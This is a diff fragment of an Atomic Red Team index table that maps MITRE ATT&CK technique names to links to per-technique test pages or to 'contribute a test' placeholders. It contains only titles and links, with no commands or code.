-|  | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Application Access Token](../../T1528/T1528.md) | [Query Registry](../../T1012/T1012.md) |  | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) |  | [Data Obfuscation via Steganography](../../T1001.002/T1001.002.md) |  |
-|  |  | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md) | [System Location Discovery](../../T1614/T1614.md) |  |  |  | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Process with Token](../../T1134.002/T1134.002.md) | [File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  |  |  | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) |  |
-|  |  | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cloud Service Discovery](../../T1526/T1526.md) |  |  |  | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | [Server Software Component: Web Shell](../../T1505.003/T1505.003.md) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | Chat Messages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) |  |  |  |  |  |
-|  |  | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) |  |  |  |  |  |
-|  |  | [Time Providers](../../T1547.003/T1547.003.md) | Temporary Elevated Cloud Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reduce Key Space [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |
-|  |  | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Debugger Evasion](../../T1622/T1622.md) |  |  |  |  |  |
-|  |  | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indirect Command Execution](../../T1202/T1202.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | [System Time Discovery](../../T1124/T1124.md) |  |  |  |  |  |
-|  |  | [Create Account: Local Account](../../T1136.001/T1136.001.md) | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
-|  |  | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Impair Defenses](../../T1562/T1562.md) | [Forced Authentication](../../T1187/T1187.md) |  |  |  |  |  |  |
-|  |  | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
-|  |  | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading](../../T1036/T1036.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
-|  |  | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Portable Executable Injection](../../T1055.002/T1055.002.md) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
-|  |  | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | [Process Injection](../../T1055/T1055.md) | Cloud Secrets Management Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
-|  |  | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md) |  |  |  |  |  |  |
-|  |  | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) |  |  |  |  |  |  |
-|  |  | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) |  |  |  |  |  |  |
-|  |  | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Reflective Code Loading](../../T1620/T1620.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
-|  |  | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
-|  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Time Based Evasion](../../T1497.003/T1497.003.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
-|  |  | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md) | [OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md) |  |  |  |  |  |  |
-|  |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | [Impair Defenses: Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md) |  |  |  |  |  |  |
-|  |  | [Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Control Panel](../../T1218.002/T1218.002.md) | [OS Credential Dumping: DCSync](../../T1003.006/T1003.006.md) |  |  |  |  |  |  |
-|  |  | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Network Address Translation Traversal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
-|  |  | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Account Manipulation](../../T1098/T1098.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) |  |  |  |  |  |  |
-|  |  | Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [Kubernetes List Secrets](../../T1552.007/T1552.007.md) |  |  |  |  |  |  |
-|  |  | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Subvert Trust Controls: SIP and Trust Provider Hijacking](../../T1553.003/T1553.003.md) | Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
-|  |  | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Container Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Disable or Modify Linux Audit System](../../T1562.012/T1562.012.md) |  |  |  |  |  |  |  |
-|  |  | [Create Account: Cloud Account](../../T1136.003/T1136.003.md) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Rogue Domain Controller](../../T1207/T1207.md) |  |  |  |  |  |  |  |
-|  |  | [Account Manipulation](../../T1098/T1098.md) | [Process Injection: Process Hollowing](../../T1055.012/T1055.012.md) | [Subvert Trust Controls: Code Signing Policy Modification](../../T1553.006/T1553.006.md) |  |  |  |  |  |  |  |
-|  |  | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deploy a container](../../T1610/T1610.md) |  |  |  |  |  |  |  |
-|  |  | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution](../../T1546/T1546.md) | [Modify Registry](../../T1112/T1112.md) |  |  |  |  |  |  |  |
-|  |  | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) |  |  |  |  |  |  |  |
-|  |  | ROMMONkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md) | Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) |  |  |  |  |  |  |  |
-|  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Authentication Package](../../T1547.002/T1547.002.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) |  |  |  |  |  |  |  |
-|  |  | Container Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) |  |  |  |  |  |  |  |
-|  |  | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) |  |  |  |  |  |  |  |
-|  |  | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | [Indicator Removal on Host: Clear Windows Event Logs](../../T1070.001/T1070.001.md) |  |  |  |  |  |  |  |
-|  |  | [IIS Components](../../T1505.004/T1505.004.md) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Permissions Modification](../../T1222/T1222.md) |  |  |  |  |  |  |  |
-|  |  | [Event Triggered Execution](../../T1546/T1546.md) | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | [Create Process with Token](../../T1134.002/T1134.002.md) |  |  |  |  |  |  |  |
-|  |  | [Authentication Package](../../T1547.002/T1547.002.md) | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) |  |  |  |  |  |  |  |
-|  |  | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | [Signed Binary Proxy Execution: Odbcconf](../../T1218.008/T1218.008.md) |  |  |  |  |  |  |  |
-|  |  | [Office Application Startup: Outlook Home Page](../../T1137.004/T1137.004.md) | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Temporary Elevated Cloud Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | Delete Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) |  |  |  |  |  |  |  |
-|  |  | [BITS Jobs](../../T1197/T1197.md) | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | [Indicator Removal on Host](../../T1070/T1070.md) |  |  |  |  |  |  |  |
-|  |  | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | [Account Manipulation: Additional Email Delegate Permissions](../../T1098.002/T1098.002.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) |  |  |  |  |  |  |  |
-|  |  | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | TCC Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) |  |  |  |  |  |  |  |
-|  |  | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) |  |  |  |  |  |  |  |
-|  |  | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | [Plist File Modification](../../T1647/T1647.md) |  |  |  |  |  |  |  |
-|  |  | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: ListPlanting](../../T1055.015/T1055.015.md) | [Subvert Trust Controls: Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) |  |  |  |  |  |  |  |
-|  |  | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | [Build Image on Host](../../T1612/T1612.md) |  |  |  |  |  |  |  |
-|  |  | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Process Injection: Portable Executable Injection](../../T1055.002/T1055.002.md) |  |  |  |  |  |  |  |
-|  |  | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | [Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | [Impair Defenses: Downgrade Attack](../../T1562.010/T1562.010.md) |  |  |  |  |  |  |  |
-|  |  | [Account Manipulation: Additional Email Delegate Permissions](../../T1098.002/T1098.002.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | Power Settings [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Signed Binary Proxy Execution: Mshta](../../T1218.005/T1218.005.md) |  |  |  |  |  |  |  |
-|  |  | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | [Office Application Startup: Office Test](../../T1137.002/T1137.002.md) |  | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) |  |  |  |  |  |  |  |
-|  |  | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) |  | LNK Icon Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) |  | [Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md) |  |  |  |  |  |  |  |
-|  |  | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping](../../T1003/T1003.md) | Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Cloud VM Connections [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Lifecycle-Triggered Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Replication Through Removable Media](../../T1091/T1091.md) | [Inter-Process Communication: Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Steal Web Session Cookie](../../T1539/T1539.md) | [Group Policy Discovery](../../T1615/T1615.md) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SMS Pumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Supply Chain Compromise](../../T1195/T1195.md) | [User Execution: Malicious File](../../T1204.002/T1204.002.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md) | [Device Driver Discovery](../../T1652/T1652.md) | [Remote Services: SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
